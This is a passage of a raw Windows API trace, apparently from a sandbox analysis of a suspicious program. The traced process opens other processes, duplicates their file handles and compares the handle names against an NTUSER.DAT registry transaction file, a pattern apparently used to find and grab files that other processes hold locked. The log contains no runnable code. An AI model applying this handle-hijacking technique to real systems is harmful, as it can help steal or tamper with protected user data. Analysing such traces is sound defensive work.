(hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.210] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.210] CloseHandle (hObject=0x1e4) returned 1 [0164.210] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.210] CloseHandle (hObject=0x194) returned 1 [0164.210] CloseHandle (hObject=0x1e8) returned 1 [0164.210] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.210] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x730, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.211] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.359] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.359] CloseHandle (hObject=0x1e4) returned 1 [0164.359] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.359] CloseHandle (hObject=0x194) returned 1 [0164.359] CloseHandle (hObject=0x1e8) returned 1 [0164.359] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.359] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.360] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.361] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.361] CloseHandle (hObject=0x1e4) returned 1 [0164.361] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.361] CloseHandle (hObject=0x194) returned 1 [0164.362] CloseHandle (hObject=0x1e8) returned 1 [0164.362] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.362] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.362] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.366] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.367] CloseHandle (hObject=0x1e4) returned 1 [0164.367] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.367] CloseHandle (hObject=0x194) returned 1 [0164.367] CloseHandle (hObject=0x1e8) returned 1 [0164.367] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.367] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x75c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.368] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.372] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.372] CloseHandle (hObject=0x1e4) returned 1 [0164.372] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.372] CloseHandle (hObject=0x194) returned 1 [0164.372] CloseHandle (hObject=0x1e8) returned 1 [0164.372] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.372] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.373] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.376] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.376] CloseHandle (hObject=0x1e4) returned 1 [0164.376] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.376] CloseHandle (hObject=0x194) returned 1 [0164.376] CloseHandle (hObject=0x1e8) returned 1 [0164.376] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.376] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.376] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.377] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.378] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.378] CloseHandle (hObject=0x1e4) returned 1 [0164.378] CloseHandle (hObject=0x194) returned 1 [0164.378] CloseHandle (hObject=0x1e8) returned 1 [0164.378] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.378] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.379] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.382] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.382] CloseHandle (hObject=0x1e4) returned 1 [0164.382] CloseHandle (hObject=0x194) returned 1 [0164.382] CloseHandle (hObject=0x1e8) returned 1 [0164.382] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.382] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.383] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.386] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.386] CloseHandle (hObject=0x1e4) returned 1 [0164.386] CloseHandle (hObject=0x194) returned 1 [0164.386] CloseHandle (hObject=0x1e8) returned 1 [0164.386] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.386] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.387] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.391] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.391] CloseHandle (hObject=0x1e4) returned 1 [0164.391] CloseHandle (hObject=0x194) returned 1 [0164.391] CloseHandle (hObject=0x1e8) returned 1 [0164.391] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.391] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.391] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.392] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.393] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.393] CloseHandle (hObject=0x1e4) returned 1 [0164.393] _wcsicmp (_Str1="\\.", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -64 [0164.393] CloseHandle (hObject=0x194) returned 1 [0164.393] CloseHandle (hObject=0x1e8) returned 1 [0164.393] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.393] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.394] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.395] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.395] CloseHandle (hObject=0x1e4) returned 1 [0164.396] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.396] CloseHandle (hObject=0x194) returned 1 [0164.396] CloseHandle (hObject=0x1e8) returned 1 [0164.396] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.396] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.397] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.398] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.398] CloseHandle (hObject=0x1e4) returned 1 [0164.398] _wcsicmp (_Str1="\\$ObjId", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -74 [0164.398] CloseHandle (hObject=0x194) returned 1 [0164.398] CloseHandle (hObject=0x1e8) returned 1 [0164.398] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.398] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.399] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.399] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.400] CloseHandle (hObject=0x1e4) returned 1 [0164.400] CloseHandle (hObject=0x194) returned 1 [0164.400] CloseHandle (hObject=0x1e8) returned 1 [0164.400] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.400] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.400] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.401] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.401] CloseHandle (hObject=0x1e4) returned 1 [0164.401] _wcsicmp (_Str1="\\tracking.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.402] CloseHandle (hObject=0x194) returned 1 [0164.402] CloseHandle (hObject=0x1e8) returned 1 [0164.402] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.402] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.402] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.403] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.403] CloseHandle (hObject=0x1e4) returned 1 [0164.404] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.404] CloseHandle (hObject=0x194) returned 1 [0164.404] CloseHandle (hObject=0x1e8) returned 1 [0164.404] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.404] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.405] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.405] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.406] CloseHandle (hObject=0x1e4) returned 1 [0164.406] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.406] CloseHandle (hObject=0x194) returned 1 [0164.406] CloseHandle (hObject=0x1e8) returned 1 [0164.406] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.406] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.407] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.407] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.408] CloseHandle (hObject=0x1e4) returned 1 [0164.408] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.408] CloseHandle (hObject=0x194) returned 1 [0164.408] CloseHandle (hObject=0x1e8) returned 1 [0164.408] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.408] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.408] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.409] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.409] CloseHandle (hObject=0x1e4) returned 1 [0164.409] CloseHandle (hObject=0x194) returned 1 [0164.409] CloseHandle (hObject=0x1e8) returned 1 [0164.409] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.409] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.410] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.411] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.411] CloseHandle (hObject=0x1e4) returned 1 [0164.411] CloseHandle (hObject=0x194) returned 1 [0164.411] CloseHandle (hObject=0x1e8) returned 1 [0164.411] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.411] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.412] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.413] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.413] CloseHandle (hObject=0x1e4) returned 1 [0164.413] CloseHandle (hObject=0x194) returned 1 [0164.413] CloseHandle (hObject=0x1e8) returned 1 [0164.413] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.413] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.418] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.419] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.419] CloseHandle (hObject=0x1e4) returned 1 [0164.419] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.419] CloseHandle (hObject=0x194) returned 1 [0164.419] CloseHandle (hObject=0x1e8) returned 1 [0164.419] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0164.419] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.420] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.421] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.421] CloseHandle (hObject=0x1e4) returned 1 [0164.421] CloseHandle (hObject=0x194) returned 1 [0164.421] CloseHandle (hObject=0x1e8) returned 1 [0164.421] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.421] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.422] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.423] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.423] CloseHandle (hObject=0x1e4) returned 1 [0164.423] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.423] CloseHandle (hObject=0x194) returned 1 [0164.423] CloseHandle (hObject=0x1e8) returned 1 [0164.423] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.424] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.424] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.425] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.425] CloseHandle (hObject=0x1e4) returned 1 [0164.426] CloseHandle (hObject=0x194) returned 1 [0164.426] CloseHandle (hObject=0x1e8) returned 1 [0164.426] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.426] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.426] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.427] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.427] CloseHandle (hObject=0x1e4) returned 1 [0164.427] CloseHandle (hObject=0x194) returned 1 [0164.428] CloseHandle (hObject=0x1e8) returned 1 [0164.428] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.428] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.428] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.430] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.433] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.433] CloseHandle (hObject=0x1e4) returned 